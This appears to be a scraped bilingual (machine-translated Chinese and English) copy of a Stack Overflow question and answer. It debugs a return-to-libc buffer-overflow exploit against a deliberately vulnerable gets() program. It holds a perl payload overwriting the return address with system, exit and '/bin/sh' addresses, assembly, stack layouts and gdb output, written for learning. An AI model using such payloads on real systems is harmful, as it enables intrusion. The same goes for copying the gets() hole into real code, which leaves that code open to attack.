返回到libc - 问题 [英] return to libc - problem
问题描述
我在与返回到libc的利用问题。问题是,什么也没有发生,但没有分段错误(是的,我居然溢出堆栈)。
I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack).
这是我的程序:
int main(int argc, char **argv) {
char array[512];
gets(array);
}
我用得到,而不是strcopy,因为我的地址开始为0x00和strcpy认为这是一个字符串的结束,所以我不能使用它。
I'm using gets instead of strcopy, because my addresses start with 0x00 and strcpy thinks it's the end of a string, so I can't use it.
下面是我所需要的地址:
Here are the addresses that I need:
$ gdb main core
(gdb) p system
$1 = {<text variable, no debug info>} 0x179680 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x16f6e0 <exit>
(gdb) x/s 0xbffffe3f
0xbffffe3f: "/bin/sh"
在输入查询正确的顺序,发生这种情况:
When inputing the right sequence, this happens:
eleanor@eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main
eleanor@eleanor32:~/testing/root$
所以没有什么。
so nothing.
但是,如果我进入520'A的(×41),那么EIP被溢出与'A的。如果有516'A',什么都不会发生,但EIP包含系统地址,继出口地址,继/ bin / sh的指针。
But if I enter 520 'A's (0x41), then the EIP is overflown with 'A's. If there's 516 'A', nothing happens but EIP contains the system address, following the exit address, following the /bin/sh pointer.
为什么没有发生?
推荐答案
让我们做一些ASM前:
Let's do some asm before:
code
$ cat gets.c
int main(int argc, char **argv) {
char array[512];
gets(array);
}
ASM
$ gcc gets.c -o getsA.s -S -fverbose-asm
$ cat gets.s
....
.globl main
.type main, @function
main:
leal 4(%esp), %ecx #,
andl $-16, %esp #,
pushl -4(%ecx) # (1)
pushl %ebp # 2
movl %esp, %ebp #,
pushl %ecx # 3
subl $516, %esp #,
leal -516(%ebp), %eax #, tmp60
movl %eax, (%esp) # tmp60,
call gets # << break here
addl $516, %esp #, << or here to see the stack picture
popl %ecx # (3')
popl %ebp # (2')
leal -4(%ecx), %esp # (1')
ret
.size main, .-main
的序言和跋(这些都是对准code)是在这里详细<一个描述href=\"http://stackoverflow.com/questions/4228261/understanding-the-purpose-of-some-assembly-statements/4228936#4228936\">Understanding一些汇编语句的目的
堆栈布局:
(char) array[0]
...
(char) array[511]
(32bit) $ecx - pushed by 3 - it was the address on the stack of the eip which main will return to
(32bit) $ebp - pushed by 2
(32bit) $esp - pushed by 1 - change the $esp to the original value
所以,如果你想改变主返回地址,你不应该改变堆栈地址将由 RET
中,也重复值通过保存在堆栈(1),(2),(3)推压。或者你也可以嵌入阵列本身在一个新的返回地址,并只覆盖(三)新的堆栈地址+ 4。 (使用516字节的字符串)
So, if you want to change a return address of main, you should not to change address in stack which will be used by ret
, but also to repeat the values saved in stack by (1),(2),(3) pushes. Or you can embed a new return address in the array itself and overwrite only (3) by the your new stack address+4. (use 516 byte string)
我建议你使用这个源$ C $ C破解它:
I suggest you use this source code to hack it:
$ cat getss.c
f()
{
char array[512];
gets(array);
}
int main(int argc, char **argv) {
f();
}
由于f所用堆栈realignement没有问题
because f have no problems with stack realignement
.globl f
.type f, @function
f:
pushl %ebp #
movl %esp, %ebp #,
subl $520, %esp #,
leal -512(%ebp), %eax #, tmp59
movl %eax, (%esp) # tmp59,
call gets #
leave
ret
.size f, .-f
堆栈布局 F()
:
(char) array[0]
...
(char) array[511]
(32bit) old ebp
(32bit) return address
断点在F()与520字节A
Breakpoint at ret instruction in f() with 520 bytes of "A"
(gdb) x/w $sp
0xXXXXXa3c: 0x41414141
这篇关于返回到libc - 问题的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!